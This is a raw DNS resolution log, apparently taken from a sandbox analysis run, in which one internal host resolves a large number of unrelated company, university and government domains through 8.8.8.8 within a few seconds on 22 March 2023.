                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.006526947 CET8.8.8.8192.168.2.50x891cNo error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.006526947 CET8.8.8.8192.168.2.50x891cNo error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.009306908 CET8.8.8.8192.168.2.50xdd8fNo error (0)assideum.com52.219.88.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.010901928 CET8.8.8.8192.168.2.50x62c2No error (0)atbauk.org172.67.196.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.010901928 CET8.8.8.8192.168.2.50x62c2No error (0)atbauk.org104.21.92.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.031619072 CET8.8.8.8192.168.2.50xb22bName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.105289936 CET8.8.8.8192.168.2.50x39a8No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.105289936 CET8.8.8.8192.168.2.50x39a8No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.112406015 CET8.8.8.8192.168.2.50x5c03Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.117573977 CET8.8.8.8192.168.2.50x9d95No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.145483971 CET8.8.8.8192.168.2.50xd842No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.173616886 CET8.8.8.8192.168.2.50x5c7eNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.177069902 CET8.8.8.8192.168.2.50xeb18No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.200460911 CET8.8.8.8192.168.2.50x3accServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.322355986 CET8.8.8.8192.168.2.50xbaf2No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.322355986 CET8.8.8.8192.168.2.50xbaf2No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.333268881 CET8.8.8.8192.168.2.50xd9c4No error (0)arowines.com104.164.117.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.358524084 CET8.8.8.8192.168.2.50xf3a9No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.382426023 CET8.8.8.8192.168.2.50x70e9No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.398339987 CET8.8.8.8192.168.2.50x38edNo error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.433336973 CET8.8.8.8192.168.2.50xffa6No error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.441771030 CET8.8.8.8192.168.2.50xb083No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.448148966 CET8.8.8.8192.168.2.50xc6f3No error (0)sigtoa.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.448148966 CET8.8.8.8192.168.2.50xc6f3No error (0)sigtoa.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.449775934 CET8.8.8.8192.168.2.50x619fNo error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.457658052 CET8.8.8.8192.168.2.50x72f3No error (0)ramkome.com62.75.216.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.483434916 CET8.8.8.8192.168.2.50x982fNo error (0)pcoyuncu.com213.142.131.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.508280039 CET8.8.8.8192.168.2.50x1983No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.519370079 CET8.8.8.8192.168.2.50x4eceNo error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.545213938 CET8.8.8.8192.168.2.50xa5c0No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.550559998 CET8.8.8.8192.168.2.50x6a28No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.552076101 CET8.8.8.8192.168.2.50x25d4No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.554714918 CET8.8.8.8192.168.2.50x4498No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.560751915 CET8.8.8.8192.168.2.50x6ca3No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.584114075 CET8.8.8.8192.168.2.50x5ec1No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.665468931 CET8.8.8.8192.168.2.50xf655No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.684700966 CET8.8.8.8192.168.2.50x64b3Name error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.710367918 CET8.8.8.8192.168.2.50xe98bNo error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.710367918 CET8.8.8.8192.168.2.50xe98bNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.710367918 CET8.8.8.8192.168.2.50xe98bNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.710367918 CET8.8.8.8192.168.2.50xe98bNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.786737919 CET8.8.8.8192.168.2.50x11fdNo error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.795742989 CET8.8.8.8192.168.2.50xe00aNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.799163103 CET8.8.8.8192.168.2.50x712dNo error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.800354004 CET8.8.8.8192.168.2.50x66faNo error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.873256922 CET8.8.8.8192.168.2.50x4bfbNo error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.891814947 CET8.8.8.8192.168.2.50xac21No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.903321028 CET8.8.8.8192.168.2.50xf866No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.903321028 CET8.8.8.8192.168.2.50xf866No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.903321028 CET8.8.8.8192.168.2.50xf866No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.909643888 CET8.8.8.8192.168.2.50x7c8eNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.922103882 CET8.8.8.8192.168.2.50xb4deNo error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.958422899 CET8.8.8.8192.168.2.50xa237No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.958422899 CET8.8.8.8192.168.2.50xa237No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:44.994929075 CET8.8.8.8192.168.2.50x71a6No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.028513908 CET8.8.8.8192.168.2.50x30f5No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.079011917 CET8.8.8.8192.168.2.50x6caeNo error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.104772091 CET8.8.8.8192.168.2.50xf5a9No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.106137991 CET8.8.8.8192.168.2.50xed3eNo error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.111248970 CET8.8.8.8192.168.2.50x2394No error (0)workplus.hu188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.111248970 CET8.8.8.8192.168.2.50x2394No error (0)workplus.hu188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.134735107 CET8.8.8.8192.168.2.50xba9No error (0)e-kami.net202.172.28.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.160687923 CET8.8.8.8192.168.2.50xad9cNo error (0)assideum.com52.219.100.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.161768913 CET8.8.8.8192.168.2.50xd27eNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.181303024 CET8.8.8.8192.168.2.50xca9aServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.196413994 CET8.8.8.8192.168.2.50xdd5fNo error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.222945929 CET8.8.8.8192.168.2.50x9e72No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.239048958 CET8.8.8.8192.168.2.50xca9aServer failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.274435997 CET8.8.8.8192.168.2.50xc118Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.275197029 CET8.8.8.8192.168.2.50x2829Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.342782021 CET8.8.8.8192.168.2.50xca11Name error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.375629902 CET8.8.8.8192.168.2.50x72a4No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.375629902 CET8.8.8.8192.168.2.50x72a4No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.378565073 CET8.8.8.8192.168.2.50x34caNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.380074978 CET8.8.8.8192.168.2.50x897fServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.388628960 CET8.8.8.8192.168.2.50x4619No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.392929077 CET8.8.8.8192.168.2.50x6bbfName error (3)koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.519988060 CET8.8.8.8192.168.2.50x2db7Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.541990042 CET8.8.8.8192.168.2.50x984No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.647726059 CET8.8.8.8192.168.2.50x453fNo error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.665863991 CET8.8.8.8192.168.2.50xdeffNo error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.668826103 CET8.8.8.8192.168.2.50x9418No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.707948923 CET8.8.8.8192.168.2.50x50e3Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.765027046 CET8.8.8.8192.168.2.50x7f5cNo error (0)k-nikko.com18.177.67.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.777230978 CET8.8.8.8192.168.2.50x54e8No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.780854940 CET8.8.8.8192.168.2.50xad62Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.799700022 CET8.8.8.8192.168.2.50x8af8No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.880924940 CET8.8.8.8192.168.2.50x17b4No error (0)dspears.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.880924940 CET8.8.8.8192.168.2.50x17b4No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.880924940 CET8.8.8.8192.168.2.50x17b4No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.880924940 CET8.8.8.8192.168.2.50x17b4No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.890234947 CET8.8.8.8192.168.2.50xf25No error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.890234947 CET8.8.8.8192.168.2.50xf25No error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.914791107 CET8.8.8.8192.168.2.50x6710Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.975151062 CET8.8.8.8192.168.2.50xce86Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:45.986093044 CET8.8.8.8192.168.2.50x4867No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.069591999 CET8.8.8.8192.168.2.50x67b2No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.073635101 CET8.8.8.8192.168.2.50xc560Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.097332001 CET8.8.8.8192.168.2.50x4c34No error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.138407946 CET8.8.8.8192.168.2.50x1d80No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.138551950 CET8.8.8.8192.168.2.50x595dNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.138551950 CET8.8.8.8192.168.2.50x595dNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.198954105 CET8.8.8.8192.168.2.50x1cc8Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.327353954 CET8.8.8.8192.168.2.50xad26No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.327353954 CET8.8.8.8192.168.2.50xad26No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.327353954 CET8.8.8.8192.168.2.50xad26No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.327353954 CET8.8.8.8192.168.2.50xad26No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.348463058 CET8.8.8.8192.168.2.50xda4dName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.355372906 CET8.8.8.8192.168.2.50xbecdNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.370055914 CET8.8.8.8192.168.2.50x3476Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.452076912 CET8.8.8.8192.168.2.50x2b36No error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.452076912 CET8.8.8.8192.168.2.50x2b36No error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.456202984 CET8.8.8.8192.168.2.50x2667No error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.456202984 CET8.8.8.8192.168.2.50x2667No error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.466651917 CET8.8.8.8192.168.2.50xa58Server failure (2)amele.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.525264978 CET8.8.8.8192.168.2.50x732No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.529644012 CET8.8.8.8192.168.2.50xdf20No error (0)bd-style.com107.165.223.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.582384109 CET8.8.8.8192.168.2.50x2d4eNo error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.607851028 CET8.8.8.8192.168.2.50x3361No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.651303053 CET8.8.8.8192.168.2.50xc348No error (0)invictus.pl193.107.88.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.674887896 CET8.8.8.8192.168.2.50x6f63No error (0)slower.it127.0.0.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.685328007 CET8.8.8.8192.168.2.50x36cdNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.686400890 CET8.8.8.8192.168.2.50xb88aNo error (0)tabbles.net188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.686400890 CET8.8.8.8192.168.2.50xb88aNo error (0)tabbles.net188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.696280003 CET8.8.8.8192.168.2.50xbfb6No error (0)kairel.com54.217.118.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.719868898 CET8.8.8.8192.168.2.50x1caeNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.771610022 CET8.8.8.8192.168.2.50xf6e2Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.797851086 CET8.8.8.8192.168.2.50x32aNo error (0)zugseil.com92.42.191.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.813426018 CET8.8.8.8192.168.2.50x6a1eNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.825429916 CET8.8.8.8192.168.2.50xac0No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.852159977 CET8.8.8.8192.168.2.50x289aNo error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.852310896 CET8.8.8.8192.168.2.50x9870No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.852310896 CET8.8.8.8192.168.2.50x9870No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.854732037 CET8.8.8.8192.168.2.50xc631No error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.871968985 CET8.8.8.8192.168.2.50x2dadServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.879452944 CET8.8.8.8192.168.2.50xa3eaNo error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.956394911 CET8.8.8.8192.168.2.50xd0b0Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.969424963 CET8.8.8.8192.168.2.50x7f2fNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.969424963 CET8.8.8.8192.168.2.50x7f2fNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.972839117 CET8.8.8.8192.168.2.50xfc17No error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.972839117 CET8.8.8.8192.168.2.50xfc17No error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:46.982852936 CET8.8.8.8192.168.2.50x95c9No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.018651009 CET8.8.8.8192.168.2.50xe06dNo error (0)dyag-eng.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.087594986 CET8.8.8.8192.168.2.50x4ab4No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.101162910 CET8.8.8.8192.168.2.50x7f9fNo error (0)wvs-net.de188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.101162910 CET8.8.8.8192.168.2.50x7f9fNo error (0)wvs-net.de188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.103682995 CET8.8.8.8192.168.2.50xbe53No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.116270065 CET8.8.8.8192.168.2.50xef6cNo error (0)kallman.net185.76.64.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.212691069 CET8.8.8.8192.168.2.50x43edNo error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.268948078 CET8.8.8.8192.168.2.50x2935No error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.268948078 CET8.8.8.8192.168.2.50x2935No error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.280169964 CET8.8.8.8192.168.2.50x4e42No error (0)dbnet.at188.94.254.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.293701887 CET8.8.8.8192.168.2.50x641bNo error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.309636116 CET8.8.8.8192.168.2.50x4841No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.309636116 CET8.8.8.8192.168.2.50x4841No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.313055992 CET8.8.8.8192.168.2.50xcf86No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.316626072 CET8.8.8.8192.168.2.50x56caNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:47.318960905 CET8.8.8.8192.168.2.50x656eNo error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
